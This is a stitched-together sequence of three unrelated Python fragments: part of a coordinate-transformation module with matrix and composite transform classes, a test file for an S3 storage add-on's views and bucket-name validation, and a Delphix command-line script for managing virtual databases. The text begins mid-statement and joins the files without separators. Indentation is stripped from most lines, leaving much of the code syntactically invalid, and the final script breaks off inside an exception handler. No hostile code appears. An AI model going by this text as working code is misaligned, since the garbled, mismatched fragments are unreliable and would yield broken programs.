hasattr(tosys, 'get_frame_attr_names')):
#the if statement is there so that non-frame things might be usable
#if it makes sense
for from_nm in fromsys.get_frame_attr_names():
if from_nm in tosys.get_frame_attr_names():
overlap.append(from_nm)
def register(self, graph):
"""
Add this transformation to the requested Transformation graph,
replacing anything already connecting these two coordinates.
Parameters
----------
graph : a TransformGraph object
The graph to register this transformation with.
"""
graph.add_transform(self.fromsys, self.tosys, self)
def unregister(self, graph):
"""
Remove this transformation from the requested transformation
graph.
Parameters
----------
graph : a TransformGraph object
The graph to unregister this transformation from.
Raises
------
ValueError
If this is not currently in the transform graph.
"""
graph.remove_transform(self.fromsys, self.tosys, self)
@abstractmethod
def __call__(self, fromcoord, toframe):
"""
Does the actual coordinate transformation from the ``fromsys`` class to
the ``tosys`` class.
Parameters
----------
fromcoord : fromsys object
An object of class matching ``fromsys`` that is to be transformed.
toframe : object
An object that has the attributes necessary to fully specify the
frame. That is, it must have attributes with names that match the
keys of the dictionary that ``tosys.get_frame_attr_names()``
returns. Typically this is of class ``tosys``, but it *might* be
some other class as long as it has the appropriate attributes.
Returns
-------
tocoord : tosys object
The new coordinate after the transform has been applied.
"""
class FunctionTransform(CoordinateTransform):
"""
A coordinate transformation defined by a function that accepts a
coordinate object and returns the transformed coordinate object.
Parameters
----------
func : callable
The transformation function. Should have a call signature
``func(fromcoord, toframe)``. Note that, unlike
`CoordinateTransform.__call__`, ``toframe`` is assumed to be of type
``tosys`` for this function.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``func`` is not callable.
ValueError
If ``func`` cannot accept two arguments.
"""
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None):
if not six.callable(func):
raise TypeError('func must be callable')
with ignored(TypeError):
    sig = signature(func)
    params = list(sig.parameters.values())
    # ``func`` must be callable with two positional arguments
    # (``fromcoord`` and ``toframe``), either declared explicitly or
    # absorbed by a ``*args`` parameter.
    n_positional = len([p for p in params
                        if p.kind in (p.POSITIONAL_ONLY,
                                      p.POSITIONAL_OR_KEYWORD)])
    has_var_positional = any(p.kind == p.VAR_POSITIONAL for p in params)
    if n_positional < 2 and not has_var_positional:
        raise ValueError('provided function does not accept two arguments')
self.func = func
super(FunctionTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
res = self.func(fromcoord, toframe)
if not isinstance(res, self.tosys):
raise TypeError('the transformation function yielded {0} but '
'should have been of type {1}'.format(res, self.tosys))
return res
class StaticMatrixTransform(CoordinateTransform):
"""
A coordinate transformation defined as a 3 x 3 cartesian
transformation matrix.
This is distinct from DynamicMatrixTransform in that this kind of matrix is
independent of frame attributes. That is, it depends *only* on the class of
the frame.
Parameters
----------
matrix : array-like or callable
A 3 x 3 matrix for transforming 3-vectors. In most cases will
be unitary (although this is not strictly required). If a callable,
will be called *with no arguments* to get the matrix.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
ValueError
If the matrix is not 3 x 3
"""
def __init__(self, matrix, fromsys, tosys, priority=1, register_graph=None):
if six.callable(matrix):
matrix = matrix()
self.matrix = np.array(matrix)
if self.matrix.shape != (3, 3):
raise ValueError('Provided matrix is not 3 x 3')
super(StaticMatrixTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
from .representation import CartesianRepresentation, \
UnitSphericalRepresentation
xyz = fromcoord.represent_as(CartesianRepresentation).xyz
v = xyz.reshape((3, xyz.size // 3))
v2 = np.dot(np.asarray(self.matrix), v)
subshape = xyz.shape[1:]
x = v2[0].reshape(subshape)
y = v2[1].reshape(subshape)
z = v2[2].reshape(subshape)
newrep = CartesianRepresentation(x, y, z)
if fromcoord.data.__class__ == UnitSphericalRepresentation:
#need to special-case this because otherwise the new class will
#think it has a valid distance
newrep = newrep.represent_as(UnitSphericalRepresentation)
frameattrs = dict([(attrnm, getattr(fromcoord, attrnm))
for attrnm in self.overlapping_frame_attr_names])
return toframe.realize_frame(newrep, **frameattrs)
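# The helper below is an illustrative sketch (not part of this module's API):
# it registers a fixed z-axis rotation as a StaticMatrixTransform between two
# caller-supplied frame classes, which are assumptions standing in for real
# BaseCoordinateFrame subclasses.
def _example_static_rotation(graph, from_frame, to_frame, theta_deg=30.0):
    """Register a constant rotation about the z axis; sketch only."""
    theta = np.radians(theta_deg)
    rot_z = [[np.cos(theta), -np.sin(theta), 0.0],
             [np.sin(theta), np.cos(theta), 0.0],
             [0.0, 0.0, 1.0]]
    # register_graph does the bookkeeping via CoordinateTransform.register
    return StaticMatrixTransform(rot_z, from_frame, to_frame,
                                 register_graph=graph)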
class DynamicMatrixTransform(CoordinateTransform):
"""
A coordinate transformation specified as a function that yields a
3 x 3 cartesian transformation matrix.
This is similar to, but distinct from StaticMatrixTransform, in that the
matrix for this class might depend on frame attributes.
Parameters
----------
matrix_func : callable
A callable that has the signature ``matrix_func(fromcoord, toframe)`` and
returns a 3 x 3 matrix that converts ``fromcoord`` in a cartesian
representation to the new coordinate system.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``matrix_func`` is not callable
"""
def __init__(self, matrix_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(matrix_func):
raise TypeError('matrix_func is not callable')
self.matrix_func = matrix_func
super(DynamicMatrixTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
from .representation import CartesianRepresentation, \
UnitSphericalRepresentation
xyz = fromcoord.represent_as(CartesianRepresentation).xyz
v = xyz.reshape((3, xyz.size // 3))
v2 = np.dot(np.asarray(self.matrix_func(fromcoord, toframe)), v)
subshape = xyz.shape[1:]
x = v2[0].reshape(subshape)
y = v2[1].reshape(subshape)
z = v2[2].reshape(subshape)
newrep = CartesianRepresentation(x, y, z)
if fromcoord.data.__class__ == UnitSphericalRepresentation:
#need to special-case this because otherwise the new class will
#think it has a valid distance
newrep = newrep.represent_as(UnitSphericalRepresentation)
return toframe.realize_frame(newrep)
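# A matching sketch for DynamicMatrixTransform (illustrative only): here the
# rotation angle is read from a hypothetical ``rotation_angle`` attribute on
# the target frame, so the matrix is recomputed for every call.
def _example_dynamic_rotation(graph, from_frame, to_frame):
    """Register an attribute-dependent z-axis rotation; sketch only."""
    def rot_z_matrix(fromcoord, toframe):
        theta = getattr(toframe, 'rotation_angle', 0.0)  # assumed attribute
        return [[np.cos(theta), -np.sin(theta), 0.0],
                [np.sin(theta), np.cos(theta), 0.0],
                [0.0, 0.0, 1.0]]
    return DynamicMatrixTransform(rot_z_matrix, from_frame, to_frame,
                                  register_graph=graph)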
class CompositeTransform(CoordinateTransform):
"""
A transformation constructed by combining together a series of single-step
transformations.
Note that the intermediate frame objects are constructed using any frame
attributes in ``toframe`` or ``fromframe`` that overlap with the intermediate
frame (``toframe`` favored over ``fromframe`` if there's a conflict). Any frame
attributes that are not present use the defaults.
Parameters
----------
transforms : sequence of `CoordinateTransform` objects
The sequence of transformations to apply.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
collapse_static_mats : bool
If `True`, consecutive `StaticMatrixTransform` will be collapsed into a
single transformation to speed up the calculation.
"""
def __init__(self, transforms, fromsys, tosys, priority=1,
register_graph=None, collapse_static_mats=True):
super(CompositeTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
if collapse_static_mats:
transforms = self._combine_statics(transforms)
self.transforms = tuple(transforms)
def _combine_statics(self, transforms):
"""
Combines together sequences of `StaticMatrixTransform`s into a single
transform and returns it.
"""
newtrans = []
for currtrans in transforms:
lasttrans = newtrans[-1] if len(newtrans) > 0 else None
if (isinstance(lasttrans, StaticMatrixTransform) and
isinstance(currtrans, StaticMatrixTransform)):
# vectors are transformed as ``matrix . v`` (column vectors), so applying
# ``lasttrans`` and then ``currtrans`` corresponds to ``currtrans . lasttrans``
combinedmat = np.dot(currtrans.matrix, lasttrans.matrix)
newtrans[-1] = StaticMatrixTransform(combinedmat,
lasttrans.fromsys,
currtrans.tosys)
else:
newtrans.append(currtrans)
return newtrans
def __call__(self, fromcoord, toframe):
curr_coord = fromcoord
for t in self.transforms:
#build an intermediate frame with attributes taken from `toframe` if
#present, otherwise from `fromcoord`, otherwise use the defaults
#TODO: caching this information when creating the transform may
# speed things up a lot
frattrs = {}
for inter_frame_attr_nm in t.tosys.get_frame_attr_names():
if hasattr(toframe, inter_frame_attr_nm):
attr = getattr(toframe, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
elif hasattr(fromcoord, inter_frame_attr_nm):
attr = getattr(fromcoord, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
curr_toframe = t.tosys(**frattrs)
curr_coord = t(curr_coord, curr_toframe)
# this is safe even in the case where self.transforms is empty, because
# coordinate objects are immutable, so copying is not needed
return curr_coord
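# The sketch below ties the pieces together: build a graph, register a
# FunctionTransform with the ``transform`` decorator, then query the shortest
# path, the composite transform and the DOT representation. It is illustrative
# only; ``Frame1``/``Frame2`` are stand-ins for real BaseCoordinateFrame
# subclasses (which also provide ``get_frame_attr_names``/``realize_frame``).
def _example_graph_usage():
    """Minimal usage sketch; not part of the public API."""
    class Frame1(object):
        pass

    class Frame2(object):
        pass

    graph = TransformGraph()

    @graph.transform(FunctionTransform, Frame1, Frame2, priority=1)
    def frame1_to_frame2(fromcoord, toframe):
        # A real transform would build and return a new Frame2 coordinate.
        return toframe

    path, distance = graph.find_shortest_path(Frame1, Frame2)
    # path == [Frame1, Frame2], distance == 1.0
    composite = graph.get_transform(Frame1, Frame2)  # a CompositeTransform
    dot_source = graph.to_dot_graph()  # DOT text; pass savefn=... to write it
    return path, distance, composite, dot_source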
|
|
# -*- coding: utf-8 -*-
from rest_framework import status as http_status
from boto.exception import S3ResponseError
import mock
from nose.tools import (assert_equal, assert_equals,
assert_true, assert_in, assert_false)
import pytest
from framework.auth import Auth
from tests.base import OsfTestCase, get_default_metaschema
from osf_tests.factories import ProjectFactory, AuthUserFactory
from addons.base.tests.views import (
OAuthAddonConfigViewsTestCaseMixin
)
from addons.s3.tests.utils import S3AddonTestCase
from addons.s3.utils import validate_bucket_name, validate_bucket_location
from website.util import api_url_for
pytestmark = pytest.mark.django_db
class TestS3Views(S3AddonTestCase, OAuthAddonConfigViewsTestCaseMixin, OsfTestCase):
def setUp(self):
# Configure the return value on the mock returned by start(); setting it
# on the patcher object itself has no effect on the patched function.
self.mock_can_list = mock.patch('addons.s3.views.utils.can_list')
self.mock_can_list.start().return_value = True
self.mock_uid = mock.patch('addons.s3.views.utils.get_user_info')
self.mock_uid.start().return_value = {'id': '1234567890', 'display_name': 's3.user'}
self.mock_exists = mock.patch('addons.s3.views.utils.bucket_exists')
self.mock_exists.start().return_value = True
super(TestS3Views, self).setUp()
def tearDown(self):
self.mock_can_list.stop()
self.mock_uid.stop()
self.mock_exists.stop()
super(TestS3Views, self).tearDown()
def test_s3_settings_input_empty_keys(self):
url = self.project.api_url_for('s3_add_user_account')
rv = self.app.post_json(url, {
'access_key': '',
'secret_key': ''
}, auth=self.user.auth, expect_errors=True)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
assert_in('All the fields above are required.', rv.body)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
def test_s3_settings_input_empty_access_key(self):
url = self.project.api_url_for('s3_add_user_account')
rv = self.app.post_json(url, {
'access_key': '',
'secret_key': 'Non-empty-secret-key'
}, auth=self.user.auth, expect_errors=True)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
assert_in('All the fields above are required.', rv.body)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
def test_s3_settings_input_empty_secret_key(self):
url = self.project.api_url_for('s3_add_user_account')
rv = self.app.post_json(url, {
'access_key': 'Non-empty-access-key',
'secret_key': ''
}, auth=self.user.auth, expect_errors=True)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
assert_in('All the fields above are required.', rv.body)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
def test_s3_set_bucket_no_settings(self):
user = AuthUserFactory()
self.project.add_contributor(user, save=True)
url = self.project.api_url_for('s3_set_config')
res = self.app.put_json(
url, {'s3_bucket': 'hammertofall'}, auth=user.auth,
expect_errors=True
)
assert_equal(res.status_code, http_status.HTTP_400_BAD_REQUEST)
def test_s3_set_bucket_no_auth(self):
user = AuthUserFactory()
user.add_addon('s3')
self.project.add_contributor(user, save=True)
url = self.project.api_url_for('s3_set_config')
res = self.app.put_json(
url, {'s3_bucket': 'hammertofall'}, auth=user.auth,
expect_errors=True
)
assert_equal(res.status_code, http_status.HTTP_403_FORBIDDEN)
def test_s3_set_bucket_registered(self):
registration = self.project.register_node(
get_default_metaschema(), Auth(self.user), '', ''
)
url = registration.api_url_for('s3_set_config')
res = self.app.put_json(
url, {'s3_bucket': 'hammertofall'}, auth=self.user.auth,
expect_errors=True,
)
assert_equal(res.status_code, http_status.HTTP_400_BAD_REQUEST)
@mock.patch('addons.s3.views.utils.can_list', return_value=False)
def test_user_settings_cant_list(self, mock_can_list):
url = api_url_for('s3_add_user_account')
rv = self.app.post_json(url, {
'access_key': 'aldkjf',
'secret_key': 'las'
}, auth=self.user.auth, expect_errors=True)
assert_in('Unable to list buckets.', rv.body)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
def test_s3_remove_node_settings_owner(self):
url = self.node_settings.owner.api_url_for('s3_deauthorize_node')
self.app.delete(url, auth=self.user.auth)
result = self.Serializer().serialize_settings(node_settings=self.node_settings, current_user=self.user)
assert_equal(result['nodeHasAuth'], False)
def test_s3_remove_node_settings_unauthorized(self):
url = self.node_settings.owner.api_url_for('s3_deauthorize_node')
ret = self.app.delete(url, auth=None, expect_errors=True)
assert_equal(ret.status_code, 401)
def test_s3_get_node_settings_owner(self):
self.node_settings.set_auth(self.external_account, self.user)
self.node_settings.folder_id = 'bucket'
self.node_settings.save()
url = self.node_settings.owner.api_url_for('s3_get_config')
res = self.app.get(url, auth=self.user.auth)
result = res.json['result']
assert_equal(result['nodeHasAuth'], True)
assert_equal(result['userIsOwner'], True)
assert_equal(result['folder']['path'], self.node_settings.folder_id)
def test_s3_get_node_settings_unauthorized(self):
url = self.node_settings.owner.api_url_for('s3_get_config')
unauthorized = AuthUserFactory()
ret = self.app.get(url, auth=unauthorized.auth, expect_errors=True)
assert_equal(ret.status_code, 403)
## Overrides ##
@mock.patch('addons.s3.models.get_bucket_names')
def test_folder_list(self, mock_names):
mock_names.return_value = ['bucket1', 'bucket2']
super(TestS3Views, self).test_folder_list()
@mock.patch('addons.s3.models.bucket_exists')
@mock.patch('addons.s3.models.get_bucket_location_or_error')
def test_set_config(self, mock_location, mock_exists):
mock_exists.return_value = True
mock_location.return_value = ''
self.node_settings.set_auth(self.external_account, self.user)
url = self.project.api_url_for('{0}_set_config'.format(self.ADDON_SHORT_NAME))
res = self.app.put_json(url, {
'selected': self.folder
}, auth=self.user.auth)
assert_equal(res.status_code, http_status.HTTP_200_OK)
self.project.reload()
self.node_settings.reload()
assert_equal(
self.project.logs.latest().action,
'{0}_bucket_linked'.format(self.ADDON_SHORT_NAME)
)
assert_equal(res.json['result']['folder']['name'], self.node_settings.folder_name)
class TestCreateBucket(S3AddonTestCase, OsfTestCase):
def setUp(self):
super(TestCreateBucket, self).setUp()
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.auth = self.user.auth
self.project = ProjectFactory(creator=self.user)
self.project.add_addon('s3', auth=self.consolidated_auth)
self.project.creator.add_addon('s3')
self.user_settings = self.user.get_addon('s3')
self.user_settings.access_key = 'We-Will-Rock-You'
self.user_settings.secret_key = 'Idontknowanyqueensongs'
self.user_settings.save()
self.node_settings = self.project.get_addon('s3')
self.node_settings.bucket = 'Sheer-Heart-Attack'
self.node_settings.user_settings = self.project.creator.get_addon('s3')
self.node_settings.save()
def test_bad_names(self):
assert_false(validate_bucket_name(''))
assert_false(validate_bucket_name('no'))
assert_false(validate_bucket_name('a' * 64))
assert_false(validate_bucket_name(' leadingspace'))
assert_false(validate_bucket_name('trailingspace '))
assert_false(validate_bucket_name('bogus naMe'))
assert_false(validate_bucket_name('.cantstartwithp'))
assert_false(validate_bucket_name('or.endwith.'))
assert_false(validate_bucket_name('..nodoubles'))
assert_false(validate_bucket_name('no_unders_in'))
assert_false(validate_bucket_name('-leadinghyphen'))
assert_false(validate_bucket_name('trailinghyphen-'))
assert_false(validate_bucket_name('Mixedcase'))
assert_false(validate_bucket_name('empty..label'))
assert_false(validate_bucket_name('label-.trailinghyphen'))
assert_false(validate_bucket_name('label.-leadinghyphen'))
assert_false(validate_bucket_name('8.8.8.8'))
assert_false(validate_bucket_name('600.9000.0.28'))
assert_false(validate_bucket_name('no_underscore'))
assert_false(validate_bucket_name('_nounderscoreinfront'))
assert_false(validate_bucket_name('no-underscore-in-back_'))
assert_false(validate_bucket_name('no-underscore-in_the_middle_either'))
def test_names(self):
assert_true(validate_bucket_name('imagoodname'))
assert_true(validate_bucket_name('still.passing'))
assert_true(validate_bucket_name('can-have-dashes'))
assert_true(validate_bucket_name('kinda.name.spaced'))
assert_true(validate_bucket_name('a-o.valid'))
assert_true(validate_bucket_name('11.12.m'))
assert_true(validate_bucket_name('a--------a'))
assert_true(validate_bucket_name('a' * 63))
def test_bad_locations(self):
assert_false(validate_bucket_location('Venus'))
assert_false(validate_bucket_location('AlphaCentari'))
assert_false(validate_bucket_location('CostaRica'))
def test_locations(self):
assert_true(validate_bucket_location(''))
assert_true(validate_bucket_location('eu-central-1'))
assert_true(validate_bucket_location('ca-central-1'))
assert_true(validate_bucket_location('us-west-1'))
assert_true(validate_bucket_location('us-west-2'))
assert_true(validate_bucket_location('ap-northeast-1'))
assert_true(validate_bucket_location('ap-northeast-2'))
assert_true(validate_bucket_location('ap-southeast-1'))
assert_true(validate_bucket_location('ap-southeast-2'))
assert_true(validate_bucket_location('sa-east-1'))
assert_true(validate_bucket_location('eu-west-1'))
assert_true(validate_bucket_location('eu-west-2'))
@mock.patch('addons.s3.views.utils.create_bucket')
@mock.patch('addons.s3.views.utils.get_bucket_names')
def test_create_bucket_pass(self, mock_names, mock_make):
mock_make.return_value = True
mock_names.return_value = [
'butintheend',
'it',
'doesntevenmatter'
]
url = self.project.api_url_for('create_bucket')
ret = self.app.post_json(
url,
{
'bucket_name': 'doesntevenmatter',
'bucket_location': '',
},
auth=self.user.auth
)
assert_equal(ret.status_int, http_status.HTTP_200_OK)
assert_equal(ret.json, {})
@mock.patch('addons.s3.views.utils.create_bucket')
def test_create_bucket_fail(self, mock_make):
error = S3ResponseError(418, 'because Im a test')
error.message = 'This should work'
mock_make.side_effect = error
url = '/api/v1/project/{0}/s3/newbucket/'.format(self.project._id)
ret = self.app.post_json(url, {'bucket_name': 'doesntevenmatter'}, auth=self.user.auth, expect_errors=True)
assert_equals(ret.body, '{"message": "This should work", "title": "Problem connecting to S3"}')
@mock.patch('addons.s3.views.utils.create_bucket')
def test_bad_location_fails(self, mock_make):
url = '/api/v1/project/{0}/s3/newbucket/'.format(self.project._id)
ret = self.app.post_json(
url,
{
'bucket_name': 'doesntevenmatter',
'bucket_location': 'not a real bucket location',
},
auth=self.user.auth,
expect_errors=True)
assert_equals(ret.body, '{"message": "That bucket location is not valid.", "title": "Invalid bucket location"}')
|
|
#!/usr/bin/env python
# Corey Brune - Oct 2016
#This script starts or stops a VDB
#requirements
#pip install docopt delphixpy
#The below doc follows POSIX-compliant standards, which allows us to use
#this doc to also define our arguments for the script.
"""List all VDBs or Start, stop, enable, disable a VDB
Usage:
dx_operations_vdb.py (--vdb <name> [--stop | --start | --enable | --disable] | --list | --all_dbs <name>)
[-d <identifier> | --engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_operations_vdb.py -h | --help | -v | --version
List all VDBs, start, stop, enable, disable a VDB
Examples:
dx_operations_vdb.py --engine landsharkengine --vdb testvdb --stop
dx_operations_vdb.py --vdb testvdb --start
dx_operations_vdb.py --all_dbs enable
dx_operations_vdb.py --all_dbs disable
dx_operations_vdb.py --list
Options:
--vdb <name> Name of the VDB to stop or start
  --start                   Start the VDB
--stop Stop the VDB
--all_dbs <name> Enable or disable all dSources and VDBs
--list List all databases from an engine
--enable Enable the VDB
--disable Disable the VDB
-d <identifier> Identifier of Delphix engine in dxtools.conf.
  --engine <identifier>     Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_operations_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
VERSION = 'v.0.3.002'
import sys
from os.path import basename
from time import sleep, time
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import database
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import source
from delphixpy.v1_8_0.web.capacity import consumer
from docopt import docopt
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_info
from lib.DxLogging import print_exception
from lib.GetReferences import find_obj_by_name
from lib.GetReferences import find_all_objects
from lib.GetReferences import find_obj_list
from lib.GetReferences import find_source_by_dbname
from lib.GetSession import GetSession
def vdb_operation(vdb_name, operation):
"""
Function to start, stop, enable or disable a VDB
"""
print_debug('Searching for {} reference.\n'.format(vdb_name))
vdb_obj = find_source_by_dbname(dx_session_obj.server_session, database, vdb_name)
try:
if vdb_obj:
if operation == 'start':
source.start(dx_session_obj.server_session, vdb_obj.reference)
elif operation == 'stop':
source.stop(dx_session_obj.server_session, vdb_obj.reference)
elif operation == 'enable':
source.enable(dx_session_obj.server_session, vdb_obj.reference)
elif operation == 'disable':
source.disable(dx_session_obj.server_session,
vdb_obj.reference)
dx_session_obj.jobs[dx_session_obj.server_session.address] = \
dx_session_obj.server_session.last_job
    except (RequestError, HttpError, JobError, AttributeError) as e:
        print('An error occurred while performing {} on {}:\n'
              '{}\n'.format(operation, vdb_name, e))
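# Example call (hypothetical VDB name): vdb_operation('testvdb', 'start')
# starts that VDB and records the resulting job on dx_session_obj, which is
# exactly how the option handlers in main_workflow below invoke it.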
def all_databases(operation):
"""
Enable or disable all dSources and VDBs on an engine
operation: enable or disable dSources and VDBs
"""
for db in database.get_all(dx_session_obj.server_session, no_js_container_data_source=True):
        print('{} {}\n'.format(operation, db.name))
vdb_operation(db.name, operation)
sleep(2)
def list_databases():
"""
Function to list all databases for a given engine
"""
source_stats_lst = find_all_objects(dx_session_obj.server_session, source)
is_dSource = None
try:
for db_stats in find_all_objects(dx_session_obj.server_session,
consumer):
source_stats = find_obj_list(source_stats_lst, db_stats.name)
if source_stats is not None:
if source_stats.virtual is False:
is_dSource = 'dSource'
elif source_stats.virtual is True:
is_dSource = db_stats.parent
print('name = {}\nprovision container= {}\ndatabase disk '
'usage: {:.2f} GB\nSize of Snapshots: {:.2f} GB\n'
'Enabled: {}\nStatus:{}\n'.format(str(db_stats.name),
str(is_dSource),
db_stats.breakdown.active_space / 1024 / 1024 / 1024,
db_stats.breakdown.sync_space / 1024 / 1024 / 1024,
source_stats.runtime.enabled,
source_stats.runtime.status))
elif source_stats is None:
print('name = {}\nprovision container= {}\ndatabase disk '
'usage: {:.2f} GB\nSize of Snapshots: {:.2f} GB\n'
'Could not find source information. This could be a '
'result of an unlinked object.\n'.format(
str(db_stats.name), str(db_stats.parent),
db_stats.breakdown.active_space / 1024 / 1024 / 1024,
db_stats.breakdown.sync_space / 1024 / 1024 / 1024))
except (RequestError, JobError, AttributeError, DlpxException) as e:
        print('An error occurred while listing databases: {}'.format(e))
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
    This allows us to run against multiple Delphix Engines simultaneously
engine: Dictionary of engines
"""
jobs = {}
try:
#Setup the connection to the Delphix Engine
dx_session_obj.serversess(engine['ip_address'], engine['username'],
engine['password'])
except DlpxException as e:
        print_exception('\nERROR: Engine {} encountered an error while '
                        'establishing a session:\n{}\n'.format(
                            engine['hostname'], e))
sys.exit(1)
thingstodo = ["thingtodo"]
with dx_session_obj.job_mode(single_thread):
while len(dx_session_obj.jobs) > 0 or len(thingstodo) > 0:
            if len(thingstodo) > 0:
if arguments['--start']:
vdb_operation(arguments['--vdb'], 'start')
elif arguments['--stop']:
vdb_operation(arguments['--vdb'], 'stop')
elif arguments['--enable']:
vdb_operation(arguments['--vdb'], 'enable')
elif arguments['--disable']:
vdb_operation(arguments['--vdb'], 'disable')
elif arguments['--list']:
list_databases()
elif arguments['--all_dbs']:
try:
                        assert arguments['--all_dbs'] in ('enable', 'disable'), \
                            '--all_dbs should be either enable or disable'
all_databases(arguments['--all_dbs'])
except AssertionError as e:
                        print('ERROR:\n{}\n'.format(e))
sys.exit(1)
thingstodo.pop()
#get all the jobs, then inspect them
i = 0
for j in dx_session_obj.jobs.keys():
job_obj = job.get(dx_session_obj.server_session,
dx_session_obj.jobs[j])
print_debug(job_obj)
print_info('{}: Operations: {}'.format(engine['hostname'],
job_obj.job_state))
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
#If the job is in a non-running state, remove it from the
# running jobs list.
del dx_session_obj.jobs[j]
                elif job_obj.job_state == 'RUNNING':
#If the job is in a running state, increment the running
# job count.
i += 1
print_info('{}: {:d} jobs running.'.format(
engine['hostname'], i))
#If we have running jobs, pause before repeating the checks.
if len(dx_session_obj.jobs) > 0:
sleep(float(arguments['--poll']))
def run_job():
"""
    This function runs the main_workflow asynchronously against all the servers
specified
"""
#Create an empty list to store threads we create.
threads = []
engine = None
#If the --all argument was given, run against every engine in dxtools.conf
if arguments['--all']:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
#For each server in the dxtools.conf...
for delphix_engine in dx_session_obj.dlpx_engines:
                engine = dx_session_obj.dlpx_engines[delphix_engine]
#Create a new thread and add it to the list.
threads.append(main_workflow(engine))
except DlpxException as e:
            print('Error encountered in run_job():\n{}'.format(e))
sys.exit(1)
elif arguments['--all'] is False:
#Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments['--engine']:
try:
engine = dx_session_obj.dlpx_engines[arguments['--engine']]
print_info('Executing against Delphix Engine: {}\n'.format(
(arguments['--engine'])))
except (DlpxException, RequestError, KeyError) as e:
raise DlpxException('\nERROR: Delphix Engine {} cannot be '
'found in {}. Please check your value '
'and try again. Exiting.\n'.format(
arguments['--engine'], config_file_path))
else:
#Else search for a default engine in the dxtools.conf
for delphix_engine in dx_session_obj.dlpx_engines:
if dx_session_obj.dlpx_engines[delphix_engine]['default'] == \
'true':
engine = dx_session_obj.dlpx_engines[delphix_engine]
print_info('Executing against the default Delphix Engine '
'in the dxtools.conf: {}'.format(
dx_session_obj.dlpx_engines[delphix_engine]['hostname']))
break
            if engine is None:
raise DlpxException("\nERROR: No default engine found. Exiting")
#run the job against the engine
threads.append(main_workflow(engine))
#For each thread in the list...
for each in threads:
#join them back together so that we wait for all threads to complete
# before moving on
each.join()
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
#elapsed_minutes = round((time() - time_start)/60, +1)
#return elapsed_minutes
return round((time() - time_start)/60, +1)
def main(arguments):
#We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global dx_session_obj
global debug
if arguments['--debug']:
debug = True
try:
dx_session_obj = GetSession()
logging_est(arguments['--logdir'])
print_debug(arguments)
time_start = time()
engine = None
single_thread = False
config_file_path = arguments['--config']
#Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
#This is the function that will handle processing main_workflow for
# all the servers.
run_job()
#elapsed_minutes = time_elapsed()
print_info('script took {:.2f} minutes to get this far.'.format(
time_elapsed()))
#Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
        print_exception('Connection failed to the Delphix Engine. '
                        'Please check the ERROR message:\n{}\n'.format(e))
sys.exit(1)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that
